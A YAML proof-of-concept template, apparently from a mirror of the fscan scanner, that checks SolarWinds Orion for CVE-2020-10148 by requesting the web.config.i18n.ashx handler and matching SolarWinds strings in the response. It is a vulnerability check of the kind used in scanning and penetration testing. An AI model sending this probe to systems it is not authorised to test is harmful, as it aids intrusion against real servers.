mirror of https://github.com/qwqdanchun/fscan.git
13 lines
477 B
YAML
13 lines
477 B
YAML
|
name: poc-yaml-solarwinds-cve-2020-10148
|
||
|
set:
|
||
|
r1: randomInt(800000000, 1000000000)
|
||
|
rules:
|
||
|
- method: GET
|
||
|
path: /web.config.i18n.ashx?l=en-US&v={{r1}}
|
||
|
expression: |
|
||
|
response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl"))
|
||
|
detail:
|
||
|
author: su(https://suzzz112113.github.io/#blog)
|
||
|
CVE: CVE-2020-10148
|
||
|
links:
|
||
|
- https://kb.cert.org/vuls/id/843464
|